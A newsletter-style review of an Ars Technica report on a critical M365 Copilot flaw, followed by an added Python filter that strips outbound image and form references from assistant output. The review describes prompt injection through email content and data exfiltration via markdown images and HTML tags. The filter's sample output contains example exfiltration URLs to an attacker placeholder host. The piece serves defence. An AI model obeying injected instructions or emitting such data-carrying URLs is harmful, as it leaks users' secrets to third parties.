UpTrajectory Review
A recent report highlights a critical vulnerability in Microsoft's M365 Copilot AI platform, which could allow malicious actors to extract sensitive information such as two-factor authentication codes from user emails. This issue underscores the broader security challenges faced by AI platforms, particularly their inability to differentiate between legitimate user commands and harmful requests embedded in third-party content.
For small business owners, this vulnerability serves as a stark reminder of the security risks associated with adopting AI technologies. As AI tools become more integrated into daily operations, understanding their limitations is crucial. Companies must remain vigilant and consider implementing additional security measures to protect sensitive data, especially when using AI platforms that may inadvertently expose it. The reliance on AI should not overshadow the need for robust cybersecurity practices.
“Microsoft and other LLM providers have been unable to prevent their products from complying with malicious requests to reveal data.” — Ars Technica
Takeaway: Stay informed about AI security vulnerabilities and reinforce your cybersecurity measures to protect sensitive business data.
From the original item — Ars Technica:
Last Tuesday, Microsoft patched a vulnerability it rated as max critical in its M365 Copilot AI platform. On Monday, the researchers who discovered the vulnerability and reported it to Microsoft revealed how their proof-of-concept exploit could retrieve 2FA codes and other sensitive data from emails accessible to Copilot.
Microsoft and other LLM providers have been unable to prevent their products from complying with malicious requests to reveal data. The root cause: AI bots are unable to distinguish between instructions provided by users and those snuck into third-party content the models are summarizing, drafting responses to, or using to perform other actions on behalf of the user. With no way to secure this crucial boundary, Microsoft and its peers are left to erect complicated and ad hoc guardrails designed to rein in the consequences of this incurable gullibility.
One guardrail built into Copilot and most other LLMs prevents them from submitting web forms, sending emails, and taking similar actions that can be used to exfiltrate data from the user. To work around this, LLM hackers turned to markup language, which, among other things, allows users to add formatting elements such as headings, lists, and links to text without the need for HTML tags. Another workaround is to wrap sensitive data inside HTML tags such as <img> and <form>. In either case, a web request showing the data hits the attacker’s web server, where the secret information is captured in logs.
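The mitigation that follows from the mechanism described above is an output filter: before a rendering client displays what the assistant produced, strip any markdown image or HTML `<img>`/`<form>` reference that points at a host outside an allowlist, so the client never issues the outbound request that would carry leaked text to a third-party server. The code below is an added illustration of that check and is not Microsoft's, Copilot's, or Ars Technica's code; the allowlist, the `.invalid` hostnames (a reserved TLD that never resolves), and the sample assistant output are constructed for the example.

```python
import re
from urllib.parse import urlsplit

# Constructed allowlist: hosts the rendering client may fetch images from or submit forms to.
ALLOWED_HOSTS = {"cdn.contoso.example"}

# Markdown image syntax: ![alt](url "optional title"); group 1 is the URL.
MD_IMAGE_RE = re.compile(r'!\[[^\]]*\]\(\s*<?([^\s)>]+)>?[^)]*\)')
# HTML <img ... src="..."> and <form ... action="..."> ... </form>; group 1 is the URL.
HTML_IMG_RE = re.compile(r'<img\b[^>]*\bsrc\s*=\s*["\']?([^"\'\s>]+)[^>]*>', re.I)
HTML_FORM_RE = re.compile(
    r'<form\b[^>]*\baction\s*=\s*["\']?([^"\'\s>]+)[^>]*>.*?</form\s*>', re.I | re.S
)

# Constructed sample of assistant output: one legitimate image plus two references
# whose URLs would carry text from the user's mailbox to an outside host.
SAMPLE_OUTPUT = """Here is a summary of your inbox.

![status](https://cdn.contoso.example/ok.png)
![loading](https://collector.attacker.invalid/pixel.png?v=CODE_PLACEHOLDER)
<img src="https://collector.attacker.invalid/p?subject=Your+verification+code">
"""


def _external_host(url, allowed_hosts):
    """Return the hostname if the URL would cause a web request to a non-allowlisted host, else None."""
    parts = urlsplit(url)
    if parts.scheme and parts.scheme.lower() not in ("http", "https"):
        return None  # data: URLs and similar schemes make no network request
    if not parts.netloc:
        return None  # relative path: same origin as the rendering client
    host = (parts.hostname or "").lower()
    if not host or host in allowed_hosts:
        return None
    return host


def _carries_payload(url):
    """Heuristic: a query string or a long opaque path segment is where leaked text ends up."""
    parts = urlsplit(url)
    if parts.query:
        return True
    return any(len(segment) >= 20 for segment in parts.path.split("/"))


def find_exfil_references(text, allowed_hosts=ALLOWED_HOSTS):
    """List every image/form reference in assistant output that points off the allowlist."""
    findings = []
    for kind, pattern in (
        ("markdown_image", MD_IMAGE_RE),
        ("html_img", HTML_IMG_RE),
        ("html_form", HTML_FORM_RE),
    ):
        for match in pattern.finditer(text):
            url = match.group(1)
            host = _external_host(url, allowed_hosts)
            if host is None:
                continue
            findings.append(
                {"kind": kind, "host": host, "url": url, "carries_payload": _carries_payload(url)}
            )
    return findings


def sanitize_llm_output(text, allowed_hosts=ALLOWED_HOSTS):
    """Return (clean_text, findings): external references are replaced with an inert marker
    so the renderer never issues the request; findings go to the security log."""
    findings = find_exfil_references(text, allowed_hosts)

    def _replace(match):
        if _external_host(match.group(1), allowed_hosts) is None:
            return match.group(0)  # allowlisted or non-network reference: keep as-is
        return "[blocked external reference]"

    clean = text
    for pattern in (MD_IMAGE_RE, HTML_IMG_RE, HTML_FORM_RE):
        clean = pattern.sub(_replace, clean)
    return clean, findings


if __name__ == "__main__":
    cleaned, hits = sanitize_llm_output(SAMPLE_OUTPUT)
    for hit in hits:
        print(f"BLOCKED {hit['kind']} -> {hit['host']} (payload-like: {hit['carries_payload']})")
    print(cleaned)
```

Run this filter where the assistant's text is turned into something a browser or mail client will render, not inside the model prompt: the point is that no guardrail on the model's side is needed for the request to be stopped, because the client simply never fetches the URL. Ordinary `[text](url)` links are left alone here since they require a click; whether to rewrite those through a warning page is a separate policy decision. The `carries_payload` flag is only a heuristic for triage, so log every external reference, not just the flagged ones.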